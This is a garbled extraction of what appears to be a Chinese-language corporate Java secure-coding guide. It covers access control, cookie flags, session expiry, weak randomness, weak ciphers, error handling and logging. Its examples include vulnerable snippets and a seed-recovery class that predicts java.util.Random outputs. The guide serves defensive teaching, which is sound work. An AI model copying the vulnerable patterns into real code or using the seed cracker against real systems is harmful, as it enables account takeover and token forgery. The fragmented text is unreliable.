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CD" w:rsidRPr="001807CD" w:rsidRDefault="001807CD" w:rsidP="001807CD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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目录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二零一零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阿里巴巴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目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使用范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适合读者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版本控制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分发控制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一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展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 Site Script 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 1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hird-party script references 1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方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二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伪装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-Site Request Forgery 1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常见问题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9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 redirect 19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9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9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方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9 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系统集成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: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企业运维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系统部署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智能家居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信息安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三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 injection 2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3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3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de injection 24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4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4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 injection 2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ystem command injection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常见问题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四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操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le upload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名称定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9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9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le download and Directory traversal 3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五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访问控制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Vertical Access Control 3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名称定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方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orizontal Access Control 3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3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4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常见问题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4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六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Sessi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管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 httponly flag 35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常见问题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 Secure flag 3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名称定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方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6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ssion Expires 3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七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密码算法安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secure Pseudo randomness 3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9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sufficient Encryption Strength 4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八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错误处理与日志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rror Handling 4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3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3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Logging 44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记录日志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4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日志存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4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日志字段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4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九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Changelog 4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十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相关链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45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一章页面展示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 Site Script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 Site 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，跨站脚本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利用应用程序的动态展示数据功能，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里嵌入恶意代码。当用户浏览该页之时，这些嵌入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恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的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跨站脚本攻击有两种攻击形式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反射型跨站脚本攻击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会通过社会工程学手段，发送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连接给用户打开，在用户打开页面的同时，浏览器会执行页面中嵌入的恶意脚本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存储型跨站脚本攻击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利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提供的录入或修改数据功能，将数据存储到服务器或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，当其他用户浏览展示该数据的页面时，浏览器会执行页面中嵌入的恶意脚本。所有浏览者都会受到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D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跨站攻击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中，定义了一段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根据用户的输入，显示一段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，攻击者可以在输入时，插入一段恶意脚本，最终展示时，会执行恶意脚本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D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跨站和以上两个跨站攻击的差别是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D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跨站是纯页面脚本的输出，只有规范使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才可以防御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恶意攻击者可以利用跨站脚本攻击做到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盗取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伪造用户身份登录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控制用户浏览器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结合浏览器及其插件漏洞，下载病毒木马到浏览者的计算机上执行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衍生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跳转漏洞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5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让官方网站出现钓鱼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6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蠕虫攻击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直接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展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将直接导致跨站脚本威胁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hile(rs.next()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%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d&gt;&lt;%=rs.getInt("id") %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d&gt;&lt;%=rs.getString("pname")%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d&gt;&lt;%=rs.getString("pdesc")%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d&gt;&lt;%=rs.getString("ptype")%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%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中这几个加粗的变量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rs.getInt("id"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s.getString("pname"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s.getString("pdesc"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s.getString("ptype")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被直接输出到了页面中，没有做任何安全过滤，一旦让用户可以输入数据，都可能导致用户浏览器把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/VB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脚本执行，或页面元素被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插入的页面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控制，从而造成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d&gt;&lt;?=$row["id"] ?&gt;&lt;/td&gt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d&gt;&lt;?=$row["pname"]?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d&gt;&lt;?=$row["pdesc"]?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td&gt;&lt;?=$row["ptype"]?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代码，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上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，恶意用户可以做以下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流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添加产品时插入恶意脚本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发布产品后，等待用户来浏览产品列表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个用户浏览了页面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代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lastRenderedPageBreak/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中直接显示了攻击者当时提交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pdesc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内容，也就是恶意脚本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将执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inbreak.net/a.j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脚本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脚本内容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=document.createElement("iframe");function b(){e=escape(document.cookie);c=["http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie=",e,Math.random()];document.body.appendChild(a);a.src=c.join();}setTimeout('b()',5000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获取当前浏览者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并发送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.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这个文件负责接收到用户发来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并保存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aha.tx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。这时，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已经发送到了攻击者的服务器上，攻击者可以打开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aha.tx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就是刚才那个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攻击者可以使用浏览器插件，把自己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替换成刚刚窃取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之后攻击者再次访问服务器时，服务器应用程序，就认为攻击者的身份是刚刚那个用户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/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输出规范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/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显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前，应该进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 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转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div&gt;#escapeHTML($user.name) &lt;/div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#escapeHTML($user.name)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所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输出的数据，都应该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 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转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scape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函数参考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sapi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实现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code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/HTMLEntityCodec.java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div&gt;htmlentities($row["user.name"])&lt;/div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所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输出的数据，都应该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 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转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scape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需要进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转义应该按照以下列表进行转义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amp; --&gt; &amp;amp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 --&gt; &amp;l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gt; --&gt; &amp;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" --&gt; &amp;quo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' --&gt; &amp;#39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内容中输出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需要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 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转义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转义并不能保证在脚本执行区域内数据的安全，也不能保证脚本执行代码的正常运行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&lt;script&gt;alert('#escapeJavaScript($user.name)')&lt;/script&gt;  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script&gt;x='#escapeJavaScript($user.name)'&lt;/script&gt;   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div onmouseover="x='#escapeJavaScript($user.name)'"&lt;/div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需要转义的字符包括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/  --&gt;  \/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'  --&gt;  \'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"  --&gt;  \"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\  --&gt;  \\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scapeJava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函数参考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sapi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实现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code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/JavaScriptCodec.java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对输出到富文本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做富文本安全过滤（允许用户输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情况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asttex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框架）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章内容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td&gt;&lt;td&gt;#SHTML($article.context)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过滤的代码，请参考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Fasttex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框架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富文本输出函数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asttex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源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svn.alibaba-inc.com/repos/ali_cn/commons/headquarters/trunk/commons/fasttext/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输出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数据，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输出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些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标签的属性，需要，如果接收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需要做安全检查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以下属性的值，如果是用户可控数据，需要做安全检查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'action', 'background', 'codebase', 'dynsrc', 'href', 'lowsrc', 'src'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些属性的值，一般都是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如果整串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都是由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组成的，则必须满足以下条件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http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开头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har[] uc = url.toCharArray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f(uc[0] != 'h' || uc[1] != 't' || uc[2] != 't' || uc[3] != 'p'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turn "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转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以下字符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 --&gt; %3C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gt; --&gt; %3E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" --&gt; %2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' --&gt; %2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举例使用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 href=”#surl($url)”&gt;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链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a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mg src=”#surl($imgurl)”&gt; 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传世移动互联网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。。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函数参考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asttex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框架中的实现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svn.alibaba-inc.com/repos/ali_cn/commons/headquarters/trunk/commons/fasttext/src/java/com/alibaba/china/fasttext/codec/URLRebuilder.java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5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针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D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跨站的解决方案，详见《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编码规范》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security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/JavaScript%E7%BC%96%E7%A0%81%E5%AE%89%E5%85%A8%E8%A7%84%E8%8C%83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6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在给用户设置认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加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ONL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详见《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 httponly fla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》章节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7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yl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内容中输出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需要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S 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转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举例使用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safe = ESAPI.encoder().encodeForCSS( request.getParameter("input") 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ncodeForC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实现代码参考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code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/CSSCodec.java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JAX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输出规范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输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对数据部分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转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?xml version="1.0" encoding="UTF-8" ?&gt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&lt;man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&lt;name&gt;#xmlEscape($name)&lt;/name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&lt;man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输出要先对变量内容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单独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再对变量内容做一次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cityname=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浙江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B&gt;”+StringUtil.htmlEscape(city.name)+”&lt;/B&gt;”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json =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"citys:{city:['"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Util.javascript(cityname) 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"']}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非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输出（包括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其他自定义数据格式）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spons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包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头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ntentTy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必须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并且用户可控数据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后才能输出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sponse.setContentType("application/json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rintWriter out = response.getWriter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ut.println(StringUtil.htmlEscape(ajaxReturn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FLASH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利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服务端和客户端在安全配置和文件编码上的问题，导致攻击者可以利用客户端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发起各种请求或者攻击客户端的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安全问题主要有服务端的安全设计问题和客户端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两块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服务端的安全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没有正确的配置域策略文件，导致客户端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能够绕过同源策略的限制跨域获取数据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客户端安全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客户端在嵌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的时候没有指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的客户端限制策略，导致嵌入在客户端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可以访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D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数或者发起跨域请求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恶意攻击者利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安全问题可以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绕过浏览器同源策略的限制发起跨域请求，比如发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直接更改页面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d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树，发起钓鱼或者跨站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服务器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domain.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错误配置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?xml version="1.0"?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cross-domain-policy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" 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cross-domain-policy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样的配置可以导致允许任何来自网络上的请求、不论该请求是来自本域内还是其它域发起的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客户端嵌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错误配置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object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase=http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0`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ame="Main" width="1000" height="600" align="middle" id="Main"&gt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embed flashvars="site=&amp;sitename=" src=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自定仪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 name="Main" allowscriptaccess="always" type="application/x-shockwave-flash"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luginspage="http://www.macromedia.com/go/getflashplayer" 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object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例子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owscriptacce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选项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way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这样的配置会使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对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通讯也就是执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不做任何限制，默认情况下值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SameDomain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既只允许来自于本域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通讯，建议设置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ever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；例子中没有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owNetwork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选项，需要把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owNetwork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设置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on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因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owNetwork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设置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（默认是）或者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terna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情况下会存在发生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风险，因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发起网络请求继承的是浏览器的会话，而且会带上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ssion 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本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.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引发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一个页面中嵌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代码如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body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hi&gt;My Flash Movie&lt;/h1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object type=”application/x-shockwave-flash” width=”550” heigt=”400”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param name=”allovwScriptAccess” value=”sameDomain”&gt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param name=”movie” value=”myMovie.swf”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param name=”quality” value=”high”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param name=”bgcolor” value=”#ffffff”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embed src=”myMove.swf” width=”550” height=”400”&gt;&lt;/embe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object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body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以在同域下的某个地方上传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用户制作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如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Var secretUsername = “cnben”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Var secretPassword = “hello1234”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utputBox.htmlText = “please enter a password”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unction checkpassword(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utputBox.htmlText = “You must be a valid user.”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else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utputBox.htmlText = usernameBox.text +”error”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unction serPassword(newPassword:String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cretPassword = newPassword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面的请求将包含并执行一个存放在远程主机是哪个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test.com/movie.swf?userParam=&lt;script src=”http://evil.com/script/js”&gt;&lt;/script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．发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owNetwork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选项没有做配置，默认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这种情况下，上传一个如下代码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w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，用户访问包含这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w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的额网页将发起一次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mport flash.net.URLReques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mport flash.system.Security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var url = new URLRequest("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提交的目标地址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var Param = new URLVariables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Param = "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.method = "POST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.data = Param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ndToURL(url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op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配置规范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domain.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安全配置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没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，去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domian.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，对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域的根目录下需要配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domain.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策略文件，设置为只允许来自特定域的请求，比如淘宝的配置文件如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cross-domain-policy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taobao.com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taobao.net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taobaocdn.com"/&gt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allyes.com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taobao.123show.com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taobaoa.123show.com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alimama.com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alimama.cn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alimama.net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hippb.com.cn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lianpi.com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tbcdn.cn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kbcdn.com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allow-access-from domain="*.koubei.com"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cross-domain-policy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不允许添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site-control permitted-cross-domain-policies="by-content-type"/&gt;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这样会导致客户端可能自己加载自定义策略文件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客户端嵌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的安全配置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禁止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owscriptacce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way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必须设置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ever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如果设置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ameDomai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需要客户可以上传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要在单独的一个域下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owNetwork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选项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on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owfullscre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选项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als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下配置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embed allowscriptaccess="never" allowNetworking=”none” allowfullscreen=”false” height=384 width=454 src=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自定义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” wmode="transparent"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loop="false" autostart="false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开发规范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移除敏感信息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确认没有包含像用户名、密码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查询或者其他认证信息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w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里面，因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w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能够被简单的反编译而使信息泄露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客户端的验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客户端的验证能够通过反编译软件轻易的去除后重新编译，必须在客户端和服务端都做一次验证，但是服务端的验证不能少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去除调试信息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去除类似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trace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其他一些调试语句，因为他们能够暴露代码或数据的功能，如下代码片段暴露了该段代码的验证功能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传入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有加载外部数据的需求，尽量不要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params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标签或者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querystr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种形式来注入数据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w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中。可以的办法是通过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ver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端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请求来得到参数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5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allowDomain(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如果有和其他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w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通信的需求，需要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w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配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lowDomain(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为制定的来源，禁止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*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符号来允许任意来源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被严格禁止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6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ActionScript2.0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未初始化全局变量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S2.0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接受用户通过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Var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Querystr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传入的数据并放到全局变量空间中，如果利用不当会引发变量未初始化漏洞从而绕过部分认证，如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片段所示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用户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GE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请求或者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作为一个对象参数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LoggedI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设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ru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如下所示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   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S2.0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使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_resolv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属性捕获未定义的变量或函数，如下所示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                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7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加载调用外部文件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加载调用外部文件的时候需要过滤掉里面的恶意内容，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主要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metadat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里面的数据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 mp3 player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里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Mp3 ID3 Dat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可以引发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漏洞（使攻击者可以执行任意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，如下代码片段所示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est.flv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包含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将被执行；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lastRenderedPageBreak/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8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禁止直接调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xternalInterface.cal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来接受外部参数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xternalInterface.cal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可以直接调用客户端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脚本，如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片段所示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用户提交变量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va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提交参数为任意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，那么用户提交的代码就会被执行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hird-party script references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hird-party script reference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引用第三方网站脚本或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fra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指向第三方网站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三方网站，是指任何一个非阿里巴巴集团的网站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引用了第三方网站的脚本，或者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fra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指向第三方网站时，一旦这个第三方网站出现安全问题，被黑客控制写入恶意脚本，那么该页面或脚本也会展示在阿里巴巴网站上，会导致阿里巴巴网站的访问者间接受到影响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面是一段引用第三方网站脚本的代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script src=”http://www.hacker.com/trojan.js”&gt;&lt;/script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会执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ww.hacker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网站下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rojan.j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脚本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面是一段引用第三方网站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fra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代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frame src=”http://www.hacker.com/trojan.htm”&gt;&lt;/iframe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会同时打开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www.hacker.com/trojan.ht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个页面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方法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代码，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上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，恶意用户可以做以下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恶意用户会先入侵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ww.hacker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个网站，之后将恶意代码加入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www.hacker.com/trojan.js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这个文件有恶意代码时，也会被展示在阿里巴巴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上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禁止引用第三方脚本，禁止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fra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引用第三方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二章伪装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-Site Request Forgery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-Site Request Forger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，跨站请求伪造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在用户浏览网页时，利用页面元素（例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m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rc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，强迫受害者的浏览器向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发送一个改变用户信息的请求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发生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后，攻击者是强迫用户向服务器发送请求，所以会造成用户信息被迫修改，更严重者引发蠕虫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可以从站外和站内发起。从站内发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，需要利用网站本身的业务，比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自定义头像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功能，恶意用户指定自己的头像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是一个修改用户信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的链接，当其他已登录用户浏览恶意用户头像时，会自动向这个链接发送修改信息请求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从站外发送请求，则需要恶意用户在自己的服务器上，放一个自动提交修改个人信息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，并把页面地址发给受害者用户，受害者用户打开时，会发起一个请求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恶意用户能够知道网站管理后台某项功能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就可以直接攻击管理员，强迫管理员执行恶意用户定义的操作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个没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防御的代码如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ServletRequest request, HttpServletResponse response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t userid=Integer.valueOf( request.getSession().getAttribute("userid").toString(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email=request.getParameter("email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tel=request.getParameter("tel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realname=request.getParameter("realname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bject[] params = new Object[4]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0] = emai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1] = te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2] = realname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3] = userid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nal String sql = "update user set email=?,tel=?,realname=? where userid=?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nn.execUpdate(sql,params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代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userid=$_SESSION["userid"]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email=$_REQUEST["email"]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tel=$_REQUEST["tel"]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realname=$_REQUEST["realname"]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params = array()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params[0] =$emai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params[1] = $te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params[2] = $realname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params[3] =$userid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sql = "update user set email=?,tel=?,realname=? where userid=?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xecUpdate($sql,$params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中接收用户提交的参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email,tel,realname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之后修改了该用户的数据，一旦接收到一个用户发来的请求，就执行修改操作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提交表单代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form action="http://localhost/servlet/modify" method="POST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name="email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name="tel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name="realname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name="userid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type="submit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form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用户点提交时，就会触发修改操作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本例子是一个站外发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例子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代码，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上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，那么恶意用户为了攻击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登录用户，可以构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.ht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fra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b.ht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把宽和高都设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0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frame src="b.htm" width="0" height="0"&gt;&lt;/frame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是为了当攻击发生时，受害用户看不到提交成功结果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页面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b.ht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，有一个表单，和一段脚本，脚本的作用是，当页面加载时，自动提交这个表单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form id="modify" action="http://alibaba.com/servlet/modify" method="POST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name="email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name="tel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name="realname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name="userid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type="submit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form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script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document.getElementById("modify").submit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script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只要把页面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.ht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放在自己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服务器上，并发送给登录用户即可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打开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.ht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后，会自动提交表单，发送给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的那个存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漏洞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，所以用户的信息，就被迫修改了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整个攻击过程中，受害者用户仅仅看到了一个空白页面（可以伪造成其他无关页面），并且一直不知道自己的信息已经被修改了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要防御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，必须遵循一下三步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用户登陆时，设置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随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同时种植在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当用户浏览器关闭、或用户再次登录、或退出时，清除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表单中，生成一个隐藏域，它的值就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随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表单被提交后，就可以在接收用户请求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中，判断表单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值是否和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值一致，如果不一致或没有这个值，就判断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，同时记录攻击日志（日志内容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Error Handing and Logging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攻击者无法预测每一个用户登录时生成的那个随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值，所以无法伪造这个参数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1 &lt;form method="post" id="xxxx" name="xxxx" style="margin:0px;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2 $csrfToken.hiddenField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3 ...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4 &lt;/form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中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csrfToken.hiddenFiel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将会生成一个隐藏域，用于生成验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它将会作为表单的其中一个参数一起提交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建议使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防御框架，覆盖所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，示例参考《中文站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防御方案》，该方案适用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项目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软件开发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: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手机软件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桌面软件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应用系统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微信平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意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出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GE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请求修改用户数据时，一旦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出现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当前页面就不允许出现用户定义的站外链接，否则攻击者可以引诱用户点击攻击者定义的链接，访问在自己的网站，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ferer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，获取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造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泄露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常见问题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为什么不直接验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ferer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？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网站内部，也可以发出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如果先发生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，攻击者可以拿到用户页面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怎么办？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防御，是建立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防御之后的防御。如果已经出现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漏洞，攻击者就可以拿到用户页面中的所有信息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防御会失去效果，必须做好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防范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所有表单都会受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漏洞影响么？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所有修改用户个人信息的请求，都会受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漏洞影响。如果一个表单功能只是查询，不会修改任何数据，就不会受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漏洞影响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 redirect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 redirec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跳转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接收到用户提交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后，没有对参数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可信任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验证，就向用户浏览器返回跳转到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指令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的某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存在这个漏洞，恶意攻击者可以发送给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户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链接，但是用户打开后，却来到钓鱼网站页面，将会导致用户被钓鱼攻击，账号被盗，或账号相关财产被盗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是一段没有验证目的地址，就直接跳转的经典代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f(checklogin(request)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response.sendRedirect(request.getParameter("url"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存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跳转漏洞，当用户登陆成功后，会跳转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所指向的地址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方法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个正常的流程如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买家用户发送一个商品连接给商家用户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商家用户打开连接，跳转到登陆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商家用户登陆，之后自动跳转到登录前的商品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演示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代码，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攻击者可以发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china.alibaba.com/member/sigin.htm?done=http://www.hacker.com:8080/ali/sigin.htm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诱惑用户打开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用户打开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显示需要登陆，于是用户输入了账户和密码，登陆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无论用户输入什么，都跳转到了恶意攻击者指定的钓鱼页面，这个页面显示给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会员登录名或密码错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注意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链接地址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用户看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密码错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就再次输入密码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用户现在看到的页面，其实是恶意攻击者伪造的钓鱼程序，而用户却以为这些操作都是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网站上做的，所以用户在钓鱼程序中输入了密码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为了保证用户所点击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是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中生成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所以要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验证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当用户访问需要生成跳转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页面时，首先生成随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并放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在显示连接的页面上生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中加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china.alibaba.com/member/sigin.htm?done=http://www.alibaba.com&amp;token=574389278343243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在跳转前，判断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是否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oke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致，如果不一致，就判定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跳转攻击，并记录日志（日志内容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Error Handing and Logging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做页面跳转，需要判断域名白名单后，才能跳转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应用只有跳转到阿里巴巴集团网站的需求，可以设置白名单，判断目的地址是否在白名单列表中，如果不在列表中，就判定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跳转攻击，并记录日志（日志内容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Error Handing and Logging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）。不允许配置集团以外网站到白名单列表中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两个方案都可以保证所有在应用中发出的重定向地址，都是可信任的地址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三章注入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 injection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 injecti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应用程序将用户输入的内容，拼接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中，一起提交给数据库执行时，就会产生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威胁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用户的输入，也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的一部分，所以攻击者可以利用这部分可以控制的内容，注入自己定义的语句，改变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执行逻辑，让数据库执行任意自己需要的指令。通过控制部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，攻击者可以查询数据库中任何自己需要的数据，利用数据库的一些特性，可以直接获取数据库服务器的系统权限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本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攻击需要攻击者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非常了解，所以对攻击者的技术有一定要求。但是几年前，已经出现了大量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利用工具，可以让任何攻击者，只要点几下鼠标，就能达到攻击效果，这使得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的威胁，极大增加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只要支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DBC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查询，并且开发人员使用了语句拼接，都会产生这种漏洞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(jdbc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ServletRequest request, HttpServletResponse response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dbcConnection conn = new JdbcConnection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nal String sql = "select * from product where pname like '%"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+ request.getParameter("pname") + "%'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nn.execqueryResultSet(sql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(ibatis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select id="unsafe" resultMap="myResultMap"&gt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lect * from table where name like '%$value$%'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select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nSafeBean b = (UnSafeBean)sqlMap.queryForObject("value", request.getParameter("name"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sql = "select * from product where pname like '%"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.$_REQUEST["pname"] . "%'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mysqli_query($link,$sql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里把用户输入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na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拼接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中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代码，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源数据查询地址是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攻击者注入自己定义的语句时，访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为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localhost:8080/struts1/listProduct.htm?pname=e' and 1=2 union select 1,name,pass,4 from user where ''&lt;&gt;'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时，数据库执行的语句为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lect * from product where pname like '%e'  and 1=2 union select 1,name,pass,4 from user where ''&lt;&gt;'%'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加粗部分为用户输入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na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值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于是执行了关联查询，显示出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表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a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字段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可以利用这种方法，执行任意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使用预处理执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，对所有传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中的变量，做绑定。这样，用户拼接进来的变量，无论内容是什么，都会被当做替代符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?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所替代的值，数据库也不会把恶意用户拼接进来的数据，当做部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去解析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 odbc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m.mysql.jdbc.Connection conn = db.JdbcConnection.getConn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nal String sql = "select * from product where pname like ?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.sql.PreparedStatement ps = (java.sql.PreparedStatement) conn.prepareStatement(sql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s.setObject(1, "%"+request.getParameter("pname")+"%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sultSet rs = ps.executeQuery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query = "INSERT INTO myCity (Name, CountryCode, District) VALUES (?,?,?)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stmt = $mysqli-&gt;prepare($query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stmt-&gt;bind_param("sss", $val1, $val2, $val3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val1 = 'Stuttgart'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val2 = 'DEU'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$val3 = 'Baden-Wuerttemberg'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/* Execute the statement */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$stmt-&gt;execut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无论使用了哪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R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框架，都会支持用户自定义拼接语句，经常有人误解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ibernat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没有这个漏洞，其实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ibernat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也支持用户执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DBC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查询，并且支持用户把变量拼接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中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de injection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de injecti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代码注入攻击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代码中，允许接收用户输入一段代码，之后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服务器上执行这段代码，并返回给用户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用户可以自定义输入一段代码，在服务器上执行，所以恶意用户可以写一个远程控制木马，直接获取服务器控制权限，所有服务器上的资源都会被恶意用户获取和修改，甚至可以直接控制数据库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 -- JAVA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rvle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ublic void doGet(HttpServletRequest request, HttpServletResponse response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throws ServletException, IOException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response.setContentType("text/html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PrintWriter out = response.getWriter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try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File file = File.createTempFile("JavaRuntime", ".java", new File(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System.getProperty("user.dir")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String filename = file.getNam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String classname = filename.substring(0, filename.length() - 5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String[] args = new String[] { "-d"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System.getProperty("user.dir"), filename }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PrintWriter outfile = new PrintWriter(new FileOutputStream(file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outfile.write("public class " + classname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+ "{public void myfun(String args)" + "{try {"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+ request.getParameter("code"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+ "} catch (Exception e) {}}}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outfile.flush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outfile.clos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(new Main()).compile(args, outfile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URL url = new URL("file://"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     + file.getPath().substring(0,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 file.getPath().lastIndexOf("\\") + 1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java.net.URLClassLoader myloader = new URLClassLoader(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new URL[] { url }, Thread.currentThread(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 .getContextClassLoader(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Class cls = myloader.loadClass(classname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cls.getMethod("myfun", new Class[] { String.class }).invoke(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cls.newInstance(), new Object[] { "" }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} catch (Exception se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se.printStackTrac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out.println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out.flush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out.clos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val($_REQUEST["kxlzx"]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接收用户输入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d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内容，编译为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la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，之后调用这个文件相关代码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 -- JAVA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个三方工具包装好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va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调用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mport bsh.Interpreter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terpreter i = new Interpreter();  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微信开发、微信公众平台开发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//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将执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ystem.out.println( "kxlzx" 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.eval("System.out.println( "kxlzx" );")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旦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va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函数的参数是用户自定义的，将导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注入威胁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详细请参考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www.beanshell.org/manual/embeddedmode.html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对于以上的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代码，用户可以构造如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服务器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www.alibaba.com/servlet/Active?code=System.out.println("kxlzx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执行结果见下图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执行代码的参数，或文件名，禁止和用户输入相关，只能由开发人员定义代码内容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用户只能提交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，代表相应代码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 injection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 injecti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安全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原理一样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是存储数据的地方，如果在查询或修改时，如果没有做转义，直接输入或输出数据，都将导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漏洞。攻击者可以修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数据格式，增加新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节点，对数据处理流程产生影响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里是一个保存注册用户信息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例子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nal String GUESTROLE = "guest_role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...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//userdat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是准备保存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数据，接收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a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mai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两个用户提交来的数据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userdata = "&lt;USER role="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GUESTROLE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"&gt;&lt;name&gt;"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request.getParameter("name")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"&lt;/name&gt;&lt;email&gt;"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request.getParameter("email")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"&lt;/email&gt;&lt;/USER&gt;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//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保存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Dao.save(userdata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没有做任何过滤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原本注册用户后，应该产生一条这样的用户记录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?xml version="1.0" encoding="UTF-8"?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USER role="guest_role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name&gt;user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name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email&gt;user1@a.com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email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USE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但是当恶意用户输入自己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mai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输入了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1@a.com&lt;/email&gt;&lt;/USER&gt;&lt;USER role="admin_role"&gt;&lt;name&gt;kxlzx&lt;/name&gt;&lt;email&gt;user2@a.com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最终用户注册后，数据就变成了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?xml version="1.0" encoding="UTF-8"?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USER role="guest_role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&lt;name&gt;user1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name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email&gt;user1@a.com&lt;/email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USE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USER role="admin_role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name&gt;kxlzx&lt;/name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email&gt;user2@a.com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email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USE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从数据结果看，增加了一条管理员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李四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保存和展示前，对数据部分，单独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ml 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userdata = "&lt;USER role="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GUESTROLE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"&gt;&lt;name&gt;"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StringUtil.xmlencode(request.getParameter("name"))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"&lt;/name&gt;&lt;email&gt;"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StringUtil.xmlencode(rrequest.getParameter("email"))+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"&lt;/email&gt;&lt;/USER&gt;"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按照以下列表做转义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amp; --&gt; &amp;amp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 --&gt; &amp;l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gt; --&gt; &amp;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" --&gt; &amp;quo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' --&gt; &amp;#39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ystem command injection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ystem command injecti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系统命令注入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系统命令执行攻击，是指代码中有一段执行系统命令的代码，但是系统命令需要接收用户输入，恶意攻击者可以通过这个功能直接控制服务器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untime.getRuntime().exec(request.getParameter("cmd"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xec($_REQUEST["cmd"]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 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接收用户传递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m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，执行系统命令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以上代码攻击者可以输入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www.alibaba.com/servlet/command?cmd=shutdown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系统就会自动关机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所有需要执行的系统命令，必须是开发人员定义好的，不允许接收用户传来的参数，加入到系统命令中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常见问题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任何一个执行系统命令的代码，都必须经过安全工程师确认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四章文件操作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le upload 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传世移动互联网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名称定义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le uploa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任意文件上传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在处理用户上传的文件时，没有判断文件的扩展名是否在允许的范围内，就把文件保存在服务器上，导致恶意用户可以上传任意文件，甚至上传脚本木马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服务器上，直接控制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服务器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处理用户上传文件请求的代码，这段代码没有过滤文件扩展名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rintWriter pw = new PrintWriter(new BufferedWriter(new FileWriter(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request.getRealPath("/")+getFIlename(request))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rvletInputStream in = request.getInputStream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t i = in.read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hile (i != -1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w.print((char) i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 = in.read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w.clos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le_put_contents($_REQUEST["filename"],$_REQUEST["context"]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代码，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将直接把用户上传的文件，保存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目录中，上传后，用户可以通过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http://www.alibaba.com/jspmuma.jsp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访问上传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木马，控制服务器，下图为上传的木马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即使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不会被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容器解析执行，攻击者也可以上传自定义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文件，造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处理用户上传文件，要做以下检查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检查上传文件扩展名白名单，不属于白名单内，不允许上传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上传文件的目录必须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请求无法直接访问到的。如果需要访问的，必须上传到其他（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服务器不同的）域名下，并设置该目录为不解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s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等脚本语言的目录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上传文件要保存的文件名和目录名由系统根据时间生成，不允许用户自定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图片上传，要通过处理（缩略图、水印等），无异常后才能保存到服务器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5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上传文件需要做日志记录，请参照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Error Handing and Logg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le download and Directory traversal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le download and Directory traversa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任意文件下载攻击和目录遍历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处理用户请求下载文件时，允许用户提交任意文件路径，并把服务器上对应的文件直接发送给用户，这将造成任意文件下载威胁。如果让用户提交文件目录地址，就把目录下的文件列表发给用户，会造成目录遍历安全威胁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恶意用户会变换目录或文件地址，下载服务器上的敏感文件、数据库链接配置文件、网站源代码等。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广东传世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处理用户请求的代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path = request.getParameter("path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.io.OutputStream os = response.getOutputStream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.io.FileInputStream fis = new java.io.FileInputStream(path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byte[] b = new byte[1024]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t i = 0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hile ((i = fis.read(b)) &gt; 0 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s.write(b, 0, i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s.clos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s.flush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s.clos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H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$o = file_get_contents($filename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cho $o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根据用户提交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t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从服务器上获取指定文件，展示给用户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会变化参数中的文件名，下载服务器中的敏感文件，数据库配置文件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www.alibaba.com/filedownload.do?filename=/etc/passwd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对文件操作功能，做到以下几点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要下载的文件地址保存至数据库中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文件路径保存至数据库，让用户提交文件对应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载文件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下载文件之前做权限判断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文件放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无法直接访问的目录下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5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记录文件下载日志（内容见日志章节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6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不允许提供目录遍历服务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记录不符合规范的上传文件日志（日志内容请参考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Error Handing and Logging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）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五章访问控制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Vertical Access Control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名称定义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Vertical Access Contro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垂直权限安全攻击，也就是权限提升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没有做权限控制，或仅仅在菜单上做了权限控制，导致的恶意用户只要猜测其他管理页面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就可以访问或控制其他角色拥有的数据或页面，达到权限提升目的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个威胁可能导致普通用户变成管理员权限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个仅仅做了菜单控制的代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r&gt;&lt;td&gt;&lt;a href="/user.jsp"&gt;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管理个人信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a&gt;&lt;/td&gt;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%if (power.indexOf("administrators")&gt;-1){%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r&gt;&lt;td&gt;&lt;a href="/userlist.jsp"&gt;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管理所有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a&gt;&lt;/td&gt;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%}%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方法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恶意用户，可以直接猜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管理所有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页面，通过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访问，看到管理员页面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品牌营销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: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网站建设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策划营销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运营推广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电商服务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打开管理页面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首先判断当前用户是否拥有该页面的权限，如果没有权限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就判定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权限提升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，同时记录安全日志（日志内容请参考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Error Handing and Logging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）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建议使用成熟的权限框架处理权限问题，比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pring securit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orizontal Access Control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orizontal Access Contro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访问控制攻击，也就是水平权限安全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接收到用户请求，修改某条数据时，没有判断数据的所属人，或判断数据所属人时，从用户提交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ques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（用户可控数据）中，获取了数据所属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导致恶意攻击者可以通过变换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或变换所属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修改不属于自己的数据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恶意用户可以删除或修改其他人数据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访问数据层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dao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，所有的更新语句操作，都可能产生这个漏洞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以下代码存在这个漏洞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在修改用户个人信息时，从从用户提交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ques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数（用户可控数据）中，获取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执行修改操作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修改用户个人信息页面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form action="/struts1/edituser.htm" method="post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input name="userid" type="hidden" value="&lt;%=userid%&gt;"&gt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&lt;table border="1"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username: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&lt;%=rs.getString("name")%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passwd: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 &lt;input name="pass" value="&lt;%=rs.getString("pass")%&gt;"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type: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&lt;%=rs.getString("type")%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realname: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&lt;input name="realname" value="&lt;%=rs.getString("realname")%&gt;"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email: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 &lt;input name="email" value="&lt;%=rs.getString("email")%&gt;"&gt;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&lt;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tel:&lt;/td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td&gt; &lt;input name="tel" value="&lt;%=rs.getString("tel")%&gt;"&gt;&lt;/td&gt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tr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table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html:submit/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&lt;/form&gt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表单中，将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ir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作为隐藏字段，提交给处理修改个人信息的应用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面代码是修改个人信息的应用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t userid=Integer.valueOf( request.getParameter("userid"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email=request.getParameter("email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tel=request.getParameter("tel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realname=request.getParameter("realname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pass=request.getParameter("pass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dbcConnection conn = nul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ry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nn = new JdbcConnection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bject[] params = new Object[5]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0] = emai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1] = te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2] = realname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3] = pass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4] = userid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nal String sql = "update user set email=?,tel=?,realname=?,pass=? where 